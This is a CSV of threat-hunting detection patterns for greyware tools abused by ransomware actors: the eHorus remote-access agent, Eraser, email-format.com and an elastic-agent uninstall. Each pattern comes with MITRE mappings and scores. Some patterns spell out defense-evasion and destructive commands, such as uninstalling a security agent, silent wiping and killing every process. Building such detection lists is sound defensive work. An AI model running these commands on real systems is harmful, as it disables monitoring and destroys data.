"*/etc/ehorus/ehorus_agent*",".{0,1000}\/etc\/ehorus\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/init.d/ehorus_agent_daemon*",".{0,1000}\/etc\/init\.d\/ehorus_agent_daemon.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/ehorus_agent*",".{0,1000}\/usr\/bin\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/sbin/userdel -r ehorus*",".{0,1000}\/usr\/sbin\/userdel\s\-r\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/share/ehorus*",".{0,1000}\/usr\/share\/ehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/log/ehorus_agent.log*",".{0,1000}\/var\/log\/ehorus_agent\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A"
"*\eHorus Agent Menu.lnk*",".{0,1000}\\eHorus\sAgent\sMenu\.lnk.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\eHorus Agent.lnk*",".{0,1000}\\eHorus\sAgent\.lnk.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus standalone.exe*",".{0,1000}\\ehorus\sstandalone\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_agent.conf*",".{0,1000}\\ehorus_agent\.conf.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_agent.exe*",".{0,1000}\\ehorus_agent\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_agent.log*",".{0,1000}\\ehorus_agent\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_agent_disconn.log*",".{0,1000}\\ehorus_agent_disconn\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_cmd.exe*",".{0,1000}\\ehorus_cmd\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_display.exe*",".{0,1000}\\ehorus_display\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_installer_windows-*",".{0,1000}\\ehorus_installer_windows\-.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_launcher.exe*",".{0,1000}\\ehorus_launcher\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ehorus_uit.exe*",".{0,1000}\\ehorus_uit\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\eHorusMsiCustomActions.dll*",".{0,1000}\\eHorusMsiCustomActions\.dll.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Microsoft\Windows\Start Menu\Programs\eHorus Agent\*",".{0,1000}\\Microsoft\\Windows\\Start\sMenu\\Programs\\eHorus\sAgent\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\ehorus_agent\*",".{0,1000}\\Program\sFiles\\ehorus_agent\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\eHorusDispl\*",".{0,1000}\\SOFTWARE\\eHorusDispl\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*\System\CurrentControlSet\Services\ehorus*",".{0,1000}\\System\\CurrentControlSet\\Services\\ehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*\System\CurrentControlSet\Services\EHORUSAGENT*",".{0,1000}\\System\\CurrentControlSet\\Services\\EHORUSAGENT.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*>eHorus Agent Setup<*",".{0,1000}\>eHorus\sAgent\sSetup\<.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A"
"*>EHORUSAGENT<*",".{0,1000}\>EHORUSAGENT\<.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A"
"*chsh -s /bin/false ehorus*",".{0,1000}chsh\s\-s\s\/bin\/false\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ehorus_agent -f /etc/ehorus/*",".{0,1000}ehorus_agent\s\-f\s\/etc\/ehorus\/.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://portal.ehorus.com/#/agents/*",".{0,1000}https\:\/\/portal\.ehorus\.com\/\#\/agents\/.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*hub.ehorus.com",".{0,1000}hub\.ehorus\.com","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ehorus*",".{0,1000}sc\sdelete\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop ehorus*",".{0,1000}sc\sstop\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*su ehorus -s /bin/bash -c ""kill -9 -1""*",".{0,1000}su\sehorus\s\-s\s\/bin\/bash\s\-c\s\""kill\s\-9\s\-1\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*switch.ehorus.com*",".{0,1000}switch\.ehorus\.com.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /F /IM ""ehorus_agent.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_agent\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /F /IM ""ehorus_cmd.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_cmd\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /F /IM ""ehorus_display.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_display\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*umount /usr/share/ehorus/.gvfs -r >/dev/null 2>&1*",".{0,1000}umount\s\/usr\/share\/ehorus\/\.gvfs\s\-r\s\>\/dev\/null\s2\>\&1.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*useradd -d /usr/share/ehorus -p * ehorus*",".{0,1000}useradd\s\-d\s\/usr\/share\/ehorus\s\-p\s.{0,1000}\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*elastic-agent.exe uninstall*",".{0,1000}elastic\-agent\.exe\suninstall.{0,1000}","greyware_tool_keyword","elastic-agent","uninstall elast-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*https://www.email-format.com/d/*",".{0,1000}https\:\/\/www\.email\-format\.com\/d\/.{0,1000}","greyware_tool_keyword","email-format","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.email-format.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* erase /quiet /method=* data dir=*",".{0,1000}\serase\s\/quiet\s\/method\=.{0,1000}\sdata\sdir\=.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"* erase /quiet /methodName=* data dir=*",".{0,1000}\serase\s\/quiet\s\/methodName\=.{0,1000}\sdata\sdir\=.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/Eraser 5.8.8.exe*",".{0,1000}\/Eraser\s5\.8\.8\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/Eraser 6.0.10.2620.exe*",".{0,1000}\/Eraser\s6\.0\.10\.2620\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/Eraser 6.0.8.2273.exe*",".{0,1000}\/Eraser\s6\.0\.8\.2273\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/Eraser 6.0.9.2343.exe*",".{0,1000}\/Eraser\s6\.0\.9\.2343\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/Eraser 6.2.0.2994.exe*",".{0,1000}\/Eraser\s6\.2\.0\.2994\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/EraserSetup.exe*",".{0,1000}\/EraserSetup\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\eraserInstallBootstrapper\*",".{0,1000}\\AppData\\Local\\Temp\\eraserInstallBootstrapper\\.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser (x64).msi*",".{0,1000}\\Eraser\s\(x64\)\.msi.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser (x86).msi*",".{0,1000}\\Eraser\s\(x86\)\.msi.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser 5.8.8.exe",".{0,1000}\\Eraser\s5\.8\.8\.exe","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser 6.0.10.2620.exe*",".{0,1000}\\Eraser\s6\.0\.10\.2620\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser 6.0.8.2273.exe*",".{0,1000}\\Eraser\s6\.0\.8\.2273\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser 6.0.9.2343.exe*",".{0,1000}\\Eraser\s6\.0\.9\.2343\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Eraser 6.2.0.2994.exe*",".{0,1000}\\Eraser\s6\.2\.0\.2994\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\EraserSetup.exe*",".{0,1000}\\EraserSetup\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Microsoft\Windows\CurrentVersion\Run\Eraser*",".{0,1000}\\Microsoft\\Windows\\CurrentVersion\\Run\\Eraser.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#registry","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Microsoft\Windows\Start Menu\Programs\Eraser\Eraser.lnk*",".{0,1000}\\Microsoft\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Program Files\Eraser\*",".{0,1000}\\Program\sFiles\\Eraser\\.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Public\Desktop\Eraser.lnk*",".{0,1000}\\Public\\Desktop\\Eraser\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abusedby attackers for anti forensic","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
